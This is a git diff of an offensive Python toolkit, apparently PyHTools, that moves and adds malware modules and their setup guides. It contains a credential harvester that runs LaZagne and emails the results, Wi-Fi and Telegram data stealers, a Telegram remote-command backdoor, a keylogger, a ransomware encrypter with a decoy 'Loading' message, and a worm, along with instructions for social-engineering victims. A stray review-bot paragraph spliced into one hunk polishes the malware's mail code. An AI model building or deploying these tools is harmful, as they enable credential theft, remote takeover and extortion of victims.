@@ -46,5 +53,6 @@ - spoofed file_name : spoofed_al`exe.pdf` - actual file_name : spoofed_al`fdp.exe` -### Send File to victim -- Send file to victim through using attacks or social engineering. \ No newline at end of file +### Send File to victim + +- Send file to victim through using attacks or social engineering. diff --git a/pyhtools/malwares/reverse_backdoor/HTTP/HowToUse.md b/HowTo/Malwares/ReverseBackdoor-HTTP.md similarity index 97% rename from pyhtools/malwares/reverse_backdoor/HTTP/HowToUse.md rename to HowTo/Malwares/ReverseBackdoor-HTTP.md index e886bcf..dd61f9e 100644 --- a/pyhtools/malwares/reverse_backdoor/HTTP/HowToUse.md +++ b/HowTo/Malwares/ReverseBackdoor-HTTP.md @@ -5,14 +5,18 @@ ## Usage ### Attack over LAN + - Start listener + ```bash python3 listener.py ``` + > Default port = 8080 > Change port in `listerner.py` on line 33 if another service is using 8080 port - Edit `IP` and `PORT` values in `backdoor.py` on line 48 + ```python IP = 'attacker_local_ip' PORT = attacker_port # 8080 @@ -21,35 +25,41 @@ ### Attack over the internet - Start a ssh tunnel on attacker's device. + ```bash ssh -R 80:localhost: ``` - > Note : Replace with port on which local server is running + > Note : Replace with port on which local server is running - Copy link that will be available after successfully tunelling between attacker's machine and localhost.run server. + ``` example : .localhost.run ``` - Start Listener on your localhost using + ```bash python3 listener.py ``` - Replace copied link in `backdoor.py` on line 48. + ```python IP = '.localhost.run' ``` - Use social engineering to make user to execute the python file or created standalone executable/trojan. Use python to run backdoor.py script. + ``` python3 backdoor.py ``` - Now use post exploitation tools to gain admin priviliges -# Tested on +# Tested on + - Windows 10 - Debian based OSes -- Android Termux \ No newline at end of file +- Android Termux 
diff --git a/pyhtools/malwares/reverse_backdoor/TCP/HowToUse.md b/HowTo/Malwares/ReverseBackdoor-TCP.md similarity index 71% rename from pyhtools/malwares/reverse_backdoor/TCP/HowToUse.md rename to HowTo/Malwares/ReverseBackdoor-TCP.md index 1b12f3a..b3aa391 100644 --- a/pyhtools/malwares/reverse_backdoor/TCP/HowToUse.md +++ b/HowTo/Malwares/ReverseBackdoor-TCP.md @@ -1,5 +1,8 @@ +# TCP backdoor + ## Change Values according to need + - change ip and port to your desired values in listener.py and reverse_backdoor.py - run listener.py on attackers machine. @@ -7,26 +10,29 @@ - run backdoor.py on victims machine. ## Create a executable\standalone + - pip3 install pyinstaller -- Creating executable with console: +- Creating executable with console: + ```bash - $ pyinstaller python_file.py --onefile + pyinstaller python_file.py --onefile ``` -- Creating executable without console: +- Creating executable without console: + ```bash - $ pyinstaller python_file.py --onefile --noconsole + pyinstaller python_file.py --onefile --noconsole ``` - -> note : noconsole works when we're not using stream like stdin, stdout, stderr, etc. +> note : noconsole works when we're not using stream like stdin, stdout, stderr, etc. > If we're using STDI/O streams then we have to set then to DEVNULL = open(os.devnull, 'wb') then set IOstreams to DEVNULL > if using subprocess.check_output then use subprocess.check_output(command, stderr=subprocess.DEVNULL, stdin=subprocess.DEVNULL). > here stdio is being handled by check_output. so no need to handle stdio. ## Create windows executable on linux -- Install Wine -- Download Python for windows -- Install Downloaded python for windows using wine on linux + +- Install Wine +- Download Python for windows +- Install Downloaded python for windows using wine on linux - the other commands remain the same to create executable. diff --git a/HowTo/Malwares/SendEmail.md b/HowTo/Malwares/SendEmail.md new file mode 100644 index 0000000..93c0ccc --- /dev/null 
+++ b/HowTo/Malwares/SendEmail.md @@ -0,0 +1,22 @@ +# Send Email Requirements + +## Steps + +- Turn on 2FA +- Go to GoogleAcc->Security->AppPassword->Custom +- Copy generated key and use that as password + +## Use malwares.utils module + +```python +from pyhtools.malwares.utils import send_mail + +send_mail( + email = 'email.id@domain.com', + password = 'your', + receiver_mail = 'emails_separated_by_comma', + message = 'your message', + smtp_server = 'smtp.gmail.com', + smtp_port= 587 +) +``` diff --git a/pyhtools/malwares/telegram_data_harvester/HowToUse.md b/HowTo/Malwares/TelegramDataHarvester.md similarity index 99% rename from pyhtools/malwares/telegram_data_harvester/HowToUse.md rename to HowTo/Malwares/TelegramDataHarvester.md index 8a3cc23..f049454 100644 --- a/pyhtools/malwares/telegram_data_harvester/HowToUse.md +++ b/HowTo/Malwares/TelegramDataHarvester.md @@ -1,6 +1,7 @@ # How to use Telegram Data Harvester ## Steps + - Create a Gmail App Password - update telegram_data_harvester.py lines 64 and 65 with your gmail and App Password - Create a executable file or trojan @@ -8,6 +9,7 @@ - You will receive an email with telegram data as a zip when target executes the program/trojan. ## How to use their account + - Extract tdata folder from the zip file - go to your installed telegram desktop location - replace your tdata file with the zip tdata folder diff --git a/pyhtools/malwares/TelegramRemoteCodeExecutor/HowToUse.md b/HowTo/Malwares/TelegramRemoteCodeExecutor.md similarity index 96% rename from pyhtools/malwares/TelegramRemoteCodeExecutor/HowToUse.md rename to HowTo/Malwares/TelegramRemoteCodeExecutor.md index 87c330c..795bf74 100644 --- a/pyhtools/malwares/TelegramRemoteCodeExecutor/HowToUse.md +++ b/HowTo/Malwares/TelegramRemoteCodeExecutor.md 
@@ -1,12 +1,11 @@ # How to use Telegram Remote Code Executor -- Get Token for bot from [Telegram BotFather](https://t.me/botfather) and update `API_KEY` on line 7 of `TelegramRemoteCodeExecutor.py` -- Get Attacker's User ID from [UserInfoBot](https://t.me/userinfobot) or run TelegramRemoteCodeExecutor.py and use `/start` command to get user id and then update `CHAT_ID` on line 8 of `TelegramRemoteCodeExecutor.py` +- Get Token for bot from [Telegram BotFather](https://t.me/botfather) and update `API_KEY` on line 7 of `TelegramRemoteCodeExecutor.py` +- Get Attacker's User ID from [UserInfoBot](https://t.me/userinfobot) or run TelegramRemoteCodeExecutor.py and use `/start` command to get user id and then update `CHAT_ID` on line 8 of `TelegramRemoteCodeExecutor.py` - Create trojan/malware using `pyinstaller` and send it to victim - When victims runs malware program, attacker will be notified through the bot on telegram - Attacker can use commands to exploit the machine remotely through Telegram over the internet - | Command | Description | Params | |:-----:|:--------:|:-------: | | /start | starts interaction with the bot and returns command issuer details | None | diff --git a/HowTo/Malwares/WirelessProfileHarvester.md b/HowTo/Malwares/WirelessProfileHarvester.md new file mode 100644 index 0000000..25a549b --- /dev/null +++ b/HowTo/Malwares/WirelessProfileHarvester.md @@ -0,0 +1,7 @@ +# Wireless Profile Harvester + +## HOW to use + +- Read [HowTo/Malwares/SendEmail.md](./SendEmail.md) to and use app password +- Update email id and password (app password) +- Create exe: pyinstaller.exe --onefile --icon='icon_path' -n 'name_of_file' .\wireless_profile_harvestor.py diff --git a/examples/Malwares/TelegramBackdoor.py b/examples/Malwares/TelegramBackdoor.py new file mode 100644 index 0000000..d9d83fe --- /dev/null +++ b/examples/Malwares/TelegramBackdoor.py 
@@ -0,0 +1,14 @@
+from curses import start_color
+'''
+Controls the compromised machine using telegram
+'''
+import pyhtools.evil_files.malwares.telegram_remote_code_executor.TelegramRemoteCodeExecutor as evil_bot
+
+# set API_KEY and CHAT_ID before starting bot
+# Note: to find user id, start the bot, and message this bot with /start
+evil_bot.API_KEY = 'your_bot_key/token'
+evil_bot.CHAT_ID = 0 # int - attacker's user id
+
+# start bot
+# Note: for windows create malware with runtime broker
+evil_bot.start_bot()
\ No newline at end of file
diff --git a/examples/Malwares/TelegramDataHarvester.py b/examples/Malwares/TelegramDataHarvester.py
new file mode 100644
index 0000000..52ffead
--- /dev/null
+++ b/examples/Malwares/TelegramDataHarvester.py
@@ -0,0 +1,12 @@
+from pyhtools.evil_files.malwares.telegram_data_harvester.harvester import TelegramHarvester
+
+
+tdata_harvester = TelegramHarvester(
+ sender_email='dummy_email', # dummy email to send collected data
+ sender_passwd='dummy_email_passwd', # dummy email account password for authentication
+ server='smtp.gmail.com', # smtp email server domain
+ port=587, # smtp server port
+ receivers='attacker_email', # email where harvested data will sent
+)
+
+tdata_harvester.start()
diff --git a/pyhtools/malwares/keylogger/dlogs.py b/examples/Malwares/key_logger.py
similarity index 64%
rename from pyhtools/malwares/keylogger/dlogs.py
rename to examples/Malwares/key_logger.py
index f3ca53e..35b7f54 100644
--- a/pyhtools/malwares/keylogger/dlogs.py
+++ b/examples/Malwares/key_logger.py
@@ -1,4 +1,4 @@
-from keylogger import KeyLogger
+from pyhtools.evil_files.malwares.keylogger import KeyLogger
 key_logger = KeyLogger(email='yourgmailaccount', password='yourpassword', interval_in_secs=60)
 key_logger.run()
diff --git a/examples/Malwares/wifi-password-harvester.py b/examples/Malwares/wifi-password-harvester.py
new file mode 100644
index 0000000..b9b7fbd
--- /dev/null
+++ b/examples/Malwares/wifi-password-harvester.py
@@ -0,0 +1,13 @@
+import imp
+from pyhtools.evil_files.malwares.wireless_password_harvester.harvester import WiFiPasswordHarvester
+
+# create obj
+harvester = WiFiPasswordHarvester(
+ email='your_email',
+ passwd='email_passwd',
+ smtp_server='smtp.gmail.com',
+ smtp_port=587,
+)
+
+# start harvester
+harvester.start()
diff --git a/examples/Ransomwares/dmsec_decrypter.py b/examples/Ransomwares/dmsec_decrypter.py
new file mode 100644
index 0000000..ebb9e1f
--- /dev/null
+++ b/examples/Ransomwares/dmsec_decrypter.py
@@ -0,0 +1,14 @@
+from pyhtools.evil_files.ransomwares.dmsec.decrypter import DMSecDecrypter
+
+print('[*] Decrypting....')
+
+# specify paths to be decrypted
+PATHS = [r'paths_to_be_decrypted', ]
+
+KEY = input('[+] Enter KEY : ')
+
+# don't pass PATHS if all the drives are to be decrypted.
+encrypter = DMSecDecrypter(KEY, PATHS)
+encrypter.start()
+
+print('[*] Decrypted...')
diff --git a/examples/Ransomwares/dmsec_encrypter.py b/examples/Ransomwares/dmsec_encrypter.py
new file mode 100644
index 0000000..3099c53
--- /dev/null
+++ b/examples/Ransomwares/dmsec_encrypter.py
@@ -0,0 +1,21 @@
+from pyhtools.evil_files.ransomwares.dmsec.encrypter import DMSecEncrypter
+
+# Print some meaningful text, so that user don't suspect program as ransomeware
+print('[*] Loading...')
+
+# Specify paths to be encrypted
+PATHS = [
+ r'path_to_be_encrypted',
+]
+
+# don't pass PATHS if all the drives are to be encrypted
+encrypter = DMSecEncrypter(
+ paths=PATHS,
+ email='yourgmailid',
+ passwd='yourapppassword'
+ smtp_server='smtp.gmail.com',
+ smtp_port=587,
+)
+
+encrypter.start()
+print('[*] Completed')
diff --git a/examples/Worms/DirClonerWorm.py b/examples/Worms/DirClonerWorm.py
new file mode 100644
index 0000000..654230f
--- /dev/null
+++ b/examples/Worms/DirClonerWorm.py
@@ -0,0 +1,20 @@
+from pyhtools.evil_files.worms.dir_cloner import DirCloner
+
+# create obj and path
+dir_worm = DirCloner()
+path = dir_worm.get_curr_drive_folder()
+
+# set cloning directory
+dir_clone_set_status = dir_worm.set_clone_path(path)
+
+# remove print statements while creating evil files
+if dir_clone_set_status:
+ print(f"[*] Clone path : {path}")
+else:
+ print(f"[!] Failed to set new clone path {path}")
+
+# for specific folder
+dir_worm.clone_dir(times=1, start_after=0)
+
+# for specific folder and its subfolder
+dir_worm.clone_all_dirs(times=1, start_after=0, path=path)
diff --git a/pyhtools/UI/functions.py b/pyhtools/UI/functions.py
index 0c1b4bf..f2b5e38 100644
--- a/pyhtools/UI/functions.py
+++ b/pyhtools/UI/functions.py
@@ -1,11 +1,11 @@
 from pyhtools.UI.colors import *
 from prettytable import PrettyTable
+from pyhtools.evil_files.malwares.utils import send_mail
 import pyfiglet
 import os
 import sys
 import pyhtools.attackers.attackers as attacker
-import pyhtools.malwares.reverse_backdoor.TCP.listener as listener
-import pyhtools.malwares.send_mail.send_mail as mail
+import pyhtools.evil_files.malwares.reverse_backdoor.TCP.listener as listener
 def clrscr():
@@ -23,7 +23,7 @@ def banner():
 print(BRIGHT_YELLOW + pyfiglet.figlet_format('PyHTools'))
 print(BRIGHT_YELLOW + '+' + '-'*42 + '+')
- print(BRIGHT_WHITE + '| written by Dhrumil Mistry\tpht v1.0 |')
+ print(BRIGHT_WHITE + '| written by Dhrumil Mistry\tpht v1.0.1 |')
 print(BRIGHT_YELLOW + '+' + '-'*42 + '+')
@@ -72,7 +72,7 @@ def send_mail_to(email, password, receiver, subject, body) -> bool:
 '''
 print(BRIGHT_WHITE + '[*] Sending email...')
 msg = f'Subject: {subject}\n{body}'
- if mail.send_mail_to(email, receiver, password, msg):
+ if send_mail(email, receiver, password, msg):
 print(BRIGHT_YELLOW + '[\u2714] Mail Sent')
 else:
 print(BRIGHT_RED + '[\u274c] Unable to send mail.')
diff --git a/pyhtools/malwares/TelegramRemoteCodeExecutor/__init__.py b/pyhtools/evil_files/malwares/__init__.py
similarity index 100%
rename from pyhtools/malwares/TelegramRemoteCodeExecutor/__init__.py
rename to pyhtools/evil_files/malwares/__init__.py
diff --git a/pyhtools/malwares/Trojans/__init__.py b/pyhtools/evil_files/malwares/credential_harvester/__init__.py
similarity index 100%
rename from pyhtools/malwares/Trojans/__init__.py
rename to pyhtools/evil_files/malwares/credential_harvester/__init__.py
diff --git a/pyhtools/evil_files/malwares/credential_harvester/credential_harvester.py b/pyhtools/evil_files/malwares/credential_harvester/credential_harvester.py
new file mode 100644
index 0000000..cfa7c1b
--- /dev/null
+++ b/pyhtools/evil_files/malwares/credential_harvester/credential_harvester.py
@@ -0,0 +1,59 @@
+'''
+module: credential_harvester.py
+description: get user credentials on Windows machine
+platform: Windows
+'''
+import requests
+import os
+import tempfile
+import subprocess
+import zipfile
+from pyhtools.evil_files.malwares.utils import send_mail, download
+from shutil import rmtree
+
+
+class CredentialHarvester:
+ @staticmethod
+ def run(email: str, password: str, lazagne_download_link: str = r'https://github.com/AlessandroZ/LaZagne/releases/download/2.3.2/Windows.zip', smtp_server: str = 'smtp.gmail.com', smtp_port: int = 587):
+ '''
+ generates data report and sends email to self
+ '''
+ # change workding directory to tmp directory
+ tmp_dir = tempfile.gettempdir()
+ os.chdir(tmp_dir)
+
+ # get file and extracted directory names
+ file_name = lazagne_download_link.split('/')[-1] # Windows.zip
+ extract_dir = file_name.split('.')[0] # Windows
+
+ # download and unzip lazagne
+ download(lazagne_download_link)
+ with zipfile.ZipFile(file_name, 'r') as zip_file:
+ zip_file.extractall(tmp_dir)
+
+ # change to extracted directory (Windows)
+ os.chdir(extract_dir)
+
+ # generate reports
+ recovered_report = subprocess.call('laZagne_x86.exe all')
+ report = subprocess.check_output('lazagne.exe all -vv')
+ msg = f'Subject: Credential Harvester Report.\n\n{"-"*25}\n{report}\n{"-"*25}\n{recovered_report}'
+
+ # mail reports
+ send_mail(
+ email=email,
+ receiver_mail=email,
+ password=password,
+ message=msg,
+ smtp_server=smtp_server,
+ smtp_port=smtp_port,
+ )
+
+ # remove traces
+ os.chdir('..')
+ rmtree(extract_dir)
+ os.remove(file_name)
+
+
+if __name__ == '__main__':
+ CredentialHarvester.run('your_gmail', 'your_gmail_passwd')
diff --git a/pyhtools/malwares/__init__.py b/pyhtools/evil_files/malwares/keylogger/__init__.py
similarity index 100%
rename from pyhtools/malwares/__init__.py
rename to pyhtools/evil_files/malwares/keylogger/__init__.py
diff --git a/pyhtools/malwares/keylogger/keylogger.py b/pyhtools/evil_files/malwares/keylogger/keylogger.py
similarity index 100%
rename from pyhtools/malwares/keylogger/keylogger.py
rename to pyhtools/evil_files/malwares/keylogger/keylogger.py
diff --git a/pyhtools/malwares/credential_harvester/__init__.py b/pyhtools/evil_files/malwares/reverse_backdoor/HTTP/__init__.py
similarity index 100%
rename from pyhtools/malwares/credential_harvester/__init__.py
rename to pyhtools/evil_files/malwares/reverse_backdoor/HTTP/__init__.py
diff --git a/pyhtools/malwares/reverse_backdoor/HTTP/backdoor.py b/pyhtools/evil_files/malwares/reverse_backdoor/HTTP/backdoor.py
similarity index 100%
rename from pyhtools/malwares/reverse_backdoor/HTTP/backdoor.py
rename to pyhtools/evil_files/malwares/reverse_backdoor/HTTP/backdoor.py
diff --git a/pyhtools/malwares/reverse_backdoor/HTTP/listener.py b/pyhtools/evil_files/malwares/reverse_backdoor/HTTP/listener.py
similarity index 100%
rename from pyhtools/malwares/reverse_backdoor/HTTP/listener.py
rename to pyhtools/evil_files/malwares/reverse_backdoor/HTTP/listener.py
diff --git a/pyhtools/malwares/downloader/__init__.py b/pyhtools/evil_files/malwares/reverse_backdoor/TCP/__init__.py
similarity index 100%
rename from pyhtools/malwares/downloader/__init__.py
rename to pyhtools/evil_files/malwares/reverse_backdoor/TCP/__init__.py
diff --git a/pyhtools/malwares/reverse_backdoor/TCP/listener.py b/pyhtools/evil_files/malwares/reverse_backdoor/TCP/listener.py
similarity index 100%
rename from pyhtools/malwares/reverse_backdoor/TCP/listener.py
rename to pyhtools/evil_files/malwares/reverse_backdoor/TCP/listener.py
diff --git a/pyhtools/malwares/reverse_backdoor/TCP/reverse_backdoor.py b/pyhtools/evil_files/malwares/reverse_backdoor/TCP/reverse_backdoor.py
similarity index 100%
rename from pyhtools/malwares/reverse_backdoor/TCP/reverse_backdoor.py
rename to pyhtools/evil_files/malwares/reverse_backdoor/TCP/reverse_backdoor.py
diff --git a/pyhtools/malwares/keylogger/__init__.py b/pyhtools/evil_files/malwares/reverse_backdoor/__init__.py
similarity index 100%
rename from pyhtools/malwares/keylogger/__init__.py
rename to pyhtools/evil_files/malwares/reverse_backdoor/__init__.py
diff --git a/pyhtools/malwares/reverse_backdoor/HTTP/__init__.py b/pyhtools/evil_files/malwares/telegram_data_harvester/__init__.py
similarity index 100%
rename from pyhtools/malwares/reverse_backdoor/HTTP/__init__.py
rename to pyhtools/evil_files/malwares/telegram_data_harvester/__init__.py
diff --git a/pyhtools/malwares/telegram_data_harvester/telegram_data_harvester.py b/pyhtools/evil_files/malwares/telegram_data_harvester/harvester.py
similarity index 92%
rename from pyhtools/malwares/telegram_data_harvester/telegram_data_harvester.py
rename to pyhtools/evil_files/malwares/telegram_data_harvester/harvester.py
index 5123331..5c813b2 100644
--- a/pyhtools/malwares/telegram_data_harvester/telegram_data_harvester.py
+++ b/pyhtools/evil_files/malwares/telegram_data_harvester/harvester.py
@@ -144,12 +144,3 @@ def start(self):
 for tpath in self.tdata_paths:
 self.create_archive_and_send_mail(
 source_path=tpath, dest_path=self.temp_path)
-
-if __name__ == '__main__':
- tdata_harvester = TelegramHarvester(
- sender_email='dummy_email', # dummy email to send collected data
- sender_passwd='dummy_email_passwd', # dummy email account password for authentication
- server='smtp.gmail.com', # smtp email server domain
- port=587, # smtp server port
- receivers='attacker_email', # email where harvested data will sent
- )
\ No newline at end of file
diff --git a/pyhtools/malwares/TelegramRemoteCodeExecutor/TelegramRemoteCodeExecutor.py b/pyhtools/evil_files/malwares/telegram_remote_code_executor/TelegramRemoteCodeExecutor.py
similarity index 80%
rename from pyhtools/malwares/TelegramRemoteCodeExecutor/TelegramRemoteCodeExecutor.py
rename to pyhtools/evil_files/malwares/telegram_remote_code_executor/TelegramRemoteCodeExecutor.py
index df5c501..188e57e 100644
--- a/pyhtools/malwares/TelegramRemoteCodeExecutor/TelegramRemoteCodeExecutor.py
+++ b/pyhtools/evil_files/malwares/telegram_remote_code_executor/TelegramRemoteCodeExecutor.py
@@ -1,11 +1,12 @@
-import telebot, os
+import telebot
+import os
 from telebot.types import Message as tele_message
 from subprocess import check_output
 # set API_KEY and CHAT_ID before starting bot
 API_KEY = 'your_bot_key/token'
-CHAT_ID = 0 # int - attacker's user id
+CHAT_ID = 0 # int - attacker's user id
 # to find user id, start the bot, and message this bot with /start
@@ -26,11 +27,12 @@
 /download download file from the victims machine to attacker's via telegram chat
 '''
+# might raise issue, need to update API value
 bot = telebot.TeleBot(API_KEY)
 def get_victim():
- return check_output("whoami",shell=True).decode("utf-8")
+ return check_output("whoami", shell=True).decode("utf-8")
 def inform_attacker():
@@ -41,28 +43,29 @@ def inform_attacker():
 bot.send_message(CHAT_ID, text=message)
-def get_user_details(message:tele_message):
+def get_user_details(message: tele_message):
 '''
 returns messenger's details
 '''
 return f'ID : {message.from_user.id}\n Name :{message.from_user.full_name}\n[UserName] {message.from_user.username}\nIS BOT : {message.from_user.is_bot}'
-def validate_request(message:tele_message) -> bool:
+def validate_request(message: tele_message) -> bool:
 '''
 returns True is if request is from hacker, else False
 '''
 if message.from_user.id != int(CHAT_ID):
 alert_message = f'[!] Intruder Alert!!\n{get_user_details(message)}\nTried Command : {message.text}\n\nDetailed Information :{message}'
 bot.send_message(chat_id=CHAT_ID, text=alert_message)
- bot.send_message(chat_id=message.from_user.id, text='Not Authorized !!')
+ bot.send_message(chat_id=message.from_user.id,
+ text='Not Authorized !!')
 return False
 return True
 @bot.message_handler(commands=['start'])
-def start(message:tele_message):
+def start(message: tele_message):
 '''
 start conversation
 '''
@@ -74,12 +77,12 @@ def start(message:tele_message):
 @bot.message_handler(commands=['exec'])
-def execute(message:tele_message):
+def execute(message: tele_message):
 '''
 executes and returns result to the attacker
 '''
 if not validate_request(message):
- return
+ return
 cmd = message.text.split('/exec')[-1].strip()
 try:
@@ -91,7 +94,7 @@ def execute(message:tele_message):
 @bot.message_handler(commands=['help'])
-def help(message:tele_message):
+def help(message: tele_message):
 '''
 prints help
 '''
@@ -100,7 +103,7 @@ def help(message:tele_message):
 @bot.message_handler(commands=['cd'])
-def cd(message:tele_message):
+def cd(message: tele_message):
 '''
 change current working directory
 '''
@@ -114,7 +117,7 @@ def cd(message:tele_message):
 @bot.message_handler(commands=['ls'])
-def ls(message:tele_message):
+def ls(message: tele_message):
 '''
 replies with list of all the folders and files in the dir to the attacker
 '''
@@ -125,20 +128,22 @@ def ls(message:tele_message):
 @bot.message_handler(commands=['download'])
-def download_file(message:tele_message):
+def download_file(message: tele_message):
 '''
 downloads file from victim's machine to attacker's machine
 '''
 if not validate_request(message):
 return
-
+
 file_path = message.text.split('/download')[-1].strip()
 if os.path.isfile(file_path):
 with open(file_path, 'rb') as file:
 file_data = file.read()
- bot.send_document(chat_id=CHAT_ID, data=file_data, caption=f'[*] {file_path} downloaded from {get_victim()}')
+ bot.send_document(chat_id=CHAT_ID, data=file_data,
+ caption=f'[*] {file_path} downloaded from {get_victim()}')
 else:
- bot.send_message(chat_id=CHAT_ID, text=f'[!] {file_path} does not exists.')
+ bot.send_message(
+ chat_id=CHAT_ID, text=f'[!] {file_path} does not exists.')
 def start_bot():
@@ -147,9 +152,3 @@ def start_bot():
 '''
 inform_attacker()
 bot.polling()
-
-
-if __name__ == '__main__':
- # for windows create malware with runtime broker
- # while packaging remove print statements
- start_bot()
diff --git a/pyhtools/malwares/reverse_backdoor/TCP/__init__.py b/pyhtools/evil_files/malwares/telegram_remote_code_executor/__init__.py
similarity index 100%
rename from pyhtools/malwares/reverse_backdoor/TCP/__init__.py
rename to pyhtools/evil_files/malwares/telegram_remote_code_executor/__init__.py
diff --git a/pyhtools/evil_files/malwares/utils.py b/pyhtools/evil_files/malwares/utils.py
new file mode 100644
index 0000000..f8056c6
--- /dev/null
+++ b/pyhtools/evil_files/malwares/utils.py
@@ -0,0 +1,36 @@
+import smtplib
+import requests
+
+
+def send_mail(email: str, receiver_mail: list[str], password: str, message: str, smtp_server: str = 'smtp.gmail.com', smtp_port: int = 587) -> bool:
+ '''
+ sends mail to specific address/addresses.
+ '''
+ try:
+ server = smtplib.SMTP(smtp_server, smtp_port)
+ server.starttls()
+ server.login(email, password)
+ server.sendmail(email, receiver_mail, message)
+ server.quit()
+ return True
+ except smtplib.SMTPException as e:
+ print('[-] Exception : ', e)
+ return False
+
+
+def download(url: str) -> bool:
+ '''
+ description: download and save file from the url.
+ params: url
+ returns: bool
+ '''
+ try:
+ response = requests.get(url)
+ file_name = url.split('/')[-1]
+ with open(file_name, 'wb') as file:
+ file.write(response.content)
+ return True
+
+ except Exception as e:
+ print('[-] Exception : ', e)
+ return False
diff --git a/pyhtools/malwares/reverse_backdoor/__init__.py b/pyhtools/evil_files/malwares/wireless_password_harvester/__init__.py
similarity index 100%
rename from pyhtools/malwares/reverse_backdoor/__init__.py
rename to pyhtools/evil_files/malwares/wireless_password_harvester/__init__.py
diff --git a/pyhtools/malwares/wireless_password_harvester/wireless_profile_harvester.py b/pyhtools/evil_files/malwares/wireless_password_harvester/harvester.py
similarity index 74%
rename from pyhtools/malwares/wireless_password_harvester/wireless_profile_harvester.py
rename to pyhtools/evil_files/malwares/wireless_password_harvester/harvester.py
index fa8856c..456bcc9 100644
--- a/pyhtools/malwares/wireless_password_harvester/wireless_profile_harvester.py
+++ b/pyhtools/evil_files/malwares/wireless_password_harvester/harvester.py
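Review bot: The annotation `receiver_mail: list[str]` on `send_mail` in utils.py contradicts every caller this commit wires up — credential_harvester.py passes `receiver_mail=email`, the wireless harvester passes `self.email`, and the encrypter passes `receiver_mail=email` — all single strings, which `smtplib.sendmail` accepts alongside a list; annotate it as `receiver_mail: str | list[str]` and extend the docstring with "`message` must already carry its headers; callers build the `Subject:` line themselves", since the function forwards it verbatim. `list[str]` (and `str | list[str]`) as a runtime annotation needs Python 3.9/3.10 or `from __future__ import annotations`; the package's supported floor is not visible in this hunk. Separately, `server.quit()` is skipped whenever `starttls`, `login` or `sendmail` raises, so the SMTP connection is left open on the failure path; `with smtplib.SMTP(smtp_server, smtp_port) as server:` releases it on every path and keeps the `return False` handler unchanged.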
@@ -1,34 +1,18 @@
+from pyhtools.evil_files.malwares.utils import send_mail
 import subprocess
-import smtplib
 import re
 class WiFiPasswordHarvester:
- def __init__(self, email: str, passwd: str, smtp_server: str = 'smtp.gmail.com', port: int = 587) -> None:
+ def __init__(self, email: str, passwd: str, smtp_server: str = 'smtp.gmail.com', smtp_port: int = 587) -> None:
 # smtp conf
 self.smtp_server = smtp_server
- self.smtp_port = port
+ self.smtp_port = smtp_port
 # login details
 self.email = email
 self.passwd = passwd
- def send_mail(self, message: str) -> bool:
- '''
- sends email from mail to itself.
- params: mail, password, message -> str
- retuns bool
- '''
- try:
- server = smtplib.SMTP(self.smtp_server, self.smtp_port)
- server.starttls()
- server.login(self.email, self.password)
- server.sendmail(self.email, self.email, message)
- server.quit()
- return True
- except smtplib.SMTPException as e:
- return False
-
 def get_credentials(self) -> str:
 '''
 returns wifi credentials as str
@@ -71,7 +55,7 @@ def get_username():
 def start(self):
 credentials = self.get_credentials()
 if credentials:
- if self.send_mail(message=credentials):
+ if send_mail(self.email, self.email, self.passwd, credentials, self.smtp_server, self.smtp_port):
 print('[*] Process Completed Successfully')
 return True
 else:
diff --git a/pyhtools/malwares/send_mail/__init__.py b/pyhtools/evil_files/ransomwares/__init__.py
similarity index 100%
rename from pyhtools/malwares/send_mail/__init__.py
rename to pyhtools/evil_files/ransomwares/__init__.py
diff --git a/pyhtools/ransomwares/dmsec/HowToUse.md b/pyhtools/evil_files/ransomwares/dmsec/HowToUse.md
similarity index 100%
rename from pyhtools/ransomwares/dmsec/HowToUse.md
rename to pyhtools/evil_files/ransomwares/dmsec/HowToUse.md
diff --git a/pyhtools/malwares/telegram_data_harvester/__init__.py b/pyhtools/evil_files/ransomwares/dmsec/__init__.py
similarity index 100%
rename from pyhtools/malwares/telegram_data_harvester/__init__.py
rename to pyhtools/evil_files/ransomwares/dmsec/__init__.py
diff --git a/pyhtools/ransomwares/dmsec/decrypter.py b/pyhtools/evil_files/ransomwares/dmsec/decrypter.py
similarity index 78%
rename from pyhtools/ransomwares/dmsec/decrypter.py
rename to pyhtools/evil_files/ransomwares/dmsec/decrypter.py
index 5a022fb..0dbe19e 100644
--- a/pyhtools/ransomwares/dmsec/decrypter.py
+++ b/pyhtools/evil_files/ransomwares/dmsec/decrypter.py
@@ -4,15 +4,16 @@
 from os.path import join
 from psutil import disk_partitions
-class DMSECDecrypter:
- def __init__(self, key:str=None, paths:list=None) -> None:
+
+class DMSecDecrypter:
+ def __init__(self, key: str = None, paths: list = None) -> None:
 # check key
 if key == None:
 print('[!] Invalid KEY')
 exit()
 # convert key to bytes
- if type(key)==str:
+ if type(key) == str:
 key = bytes(key, encoding='utf-8')
 self.KEY = key
 print('[!] Decrypting data using KEY :', self.KEY)
@@ -27,8 +28,6 @@ def __init__(self, key:str=None, paths:list=None) -> None:
 self.PATHS = paths
 print('[!] PATHS to be decrypted :\n', self.PATHS)
-
-
 def __get_partitions_path(self) -> list:
 '''
 returns all mounted partition's mount points as a list
@@ -38,8 +37,7 @@ def __get_partitions_path(self) -> list:
 mount_points.append(partition.mountpoint)
 return mount_points
-
- def decrypt_file(self, file_path:str):
+ def decrypt_file(self, file_path: str):
 '''
 decrypts single file
 '''
@@ -61,8 +59,7 @@ def decrypt_file(self, file_path:str):
 print(f'[!] Failed to decrypt {file_path}')
 return False
-
- def decrypt_files(self, path:str):
+ def decrypt_files(self, path: str):
 '''
 decrypts all the files in the specified path
 '''
@@ -71,22 +68,6 @@ def decrypt_files(self, path:str):
 file_path = join(root, file)
 self.decrypt_file(file_path=file_path)
-
 def start(self):
 for path in self.PATHS:
 self.decrypt_files(path)
-
-
-if __name__ == '__main__':
- print('[*] Decrypting....')
-
- # specify paths to be decrypted
- PATHS = [r'paths_to_be_decrypted',]
-
- KEY = input('[+] Enter KEY : ')
-
- # don't pass PATHS if all the drives are to be decrypted.
- encrypter = DMSECDecrypter(KEY, PATHS)
- encrypter.start()
-
- print('[*] Decrypted...')
diff --git a/pyhtools/ransomwares/dmsec/dmsec_ransomeware.py b/pyhtools/evil_files/ransomwares/dmsec/encrypter.py
similarity index 56%
rename from pyhtools/ransomwares/dmsec/dmsec_ransomeware.py
rename to pyhtools/evil_files/ransomwares/dmsec/encrypter.py
index 66b1723..ced30a1 100644
--- a/pyhtools/ransomwares/dmsec/dmsec_ransomeware.py
+++ b/pyhtools/evil_files/ransomwares/dmsec/encrypter.py
@@ -1,17 +1,18 @@
-import smtplib
 from cryptography.fernet import Fernet
 from os import walk, environ
 from os.path import join
 from psutil import disk_partitions
+from pyhtools.evil_files.malwares.utils import send_mail
-class DMSECEncrypter:
- def __init__(self, paths:list=None, gmail:str=None, passwd:str=None) -> None:
